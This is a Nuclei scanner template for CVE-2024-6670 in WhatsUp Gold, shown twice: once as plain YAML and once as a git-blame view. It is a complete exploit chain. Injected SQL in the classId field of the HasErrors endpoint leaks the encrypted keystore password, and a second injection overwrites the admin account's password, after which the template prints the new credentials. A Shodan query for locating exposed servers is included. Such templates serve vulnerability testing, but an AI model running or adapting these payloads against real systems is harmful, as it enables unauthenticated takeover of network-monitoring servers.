nuclei-templates/http/cves/2024/CVE-2024-6670.yaml

id: CVE-2024-6670

info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
  reference:
    - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
    - https://www.progress.com/network-monitoring
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6670
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09569
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
  tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive

flow: |
  http(1);
  http(2);
  http(3);
  encryptedPassword = template.encryptedPassword
  const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
  const hexValues = cleanedInput.map(value => {
    const num = parseInt(value);
    return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
  });
  log(hexValues);
  const hexString = hexValues.join('');
  const varbinaryString = '0x' + hexString;
  set("encryptedPassword", varbinaryString);
  http(4);

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
        condition: and
        internal: true

  - raw:
      - |
        GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'DisplayName')
        condition: and
        internal: true

    extractors:
      - type: regex
        internal: true
        name: encryptedPassword
        regex:
          - '"psyduck\d+(,\d+)*"'

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
Create CVE-2024-6670.yaml 2024-09-02 04:42:21 +00:00			`id: CVE-2024-6670`

			`info:`
			`name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass`
			`author: DhiyaneshDK,princechaddha`
			`severity: critical`
			`description: \|`
			`In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.`
			`reference:`
			`- https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024`
			`- https://www.progress.com/network-monitoring`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2024-6670`
			`cwe-id: CWE-89`
			`epss-score: 0.00043`
			`epss-percentile: 0.09569`
			`metadata:`
			`verified: true`
Update CVE-2024-6670.yaml 2024-09-02 04:44:08 +00:00			`max-request: 4`
Create CVE-2024-6670.yaml 2024-09-02 04:42:21 +00:00			`shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094`
			`tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive`

			`flow: \|`
			`http(1);`
			`http(2);`
			`http(3);`
			`encryptedPassword = template.encryptedPassword`
			`const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);`
			`const hexValues = cleanedInput.map(value => {`
			`const num = parseInt(value);`
			`return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');`
			`});`
			`log(hexValues);`
			`const hexString = hexValues.join('');`
			`const varbinaryString = '0x' + hexString;`
			`set("encryptedPassword", varbinaryString);`
			`http(4);`

			`variables:`
			`username: "admin"`
			`password: "{{to_lower(rand_text_alpha(5))}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 302`
			`- contains(set_cookie, 'ASP.NET_SessionId=')`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- contains(content_type, 'application/json')`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- contains(body, 'DisplayName')`
			`condition: and`
			`internal: true`

			`extractors:`
			`- type: regex`
			`internal: true`
			`name: encryptedPassword`
			`regex:`
			`- '"psyduck\d+(,\d+)*"'`

			`- raw:`
			`- \|`
			`POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- contains(content_type, 'application/json')`
			`condition: and`

			`extractors:`
			`- type: dsl`
			`dsl:`
			`- '"USER: "+ username'`
			`- '"PASS: "+ password'`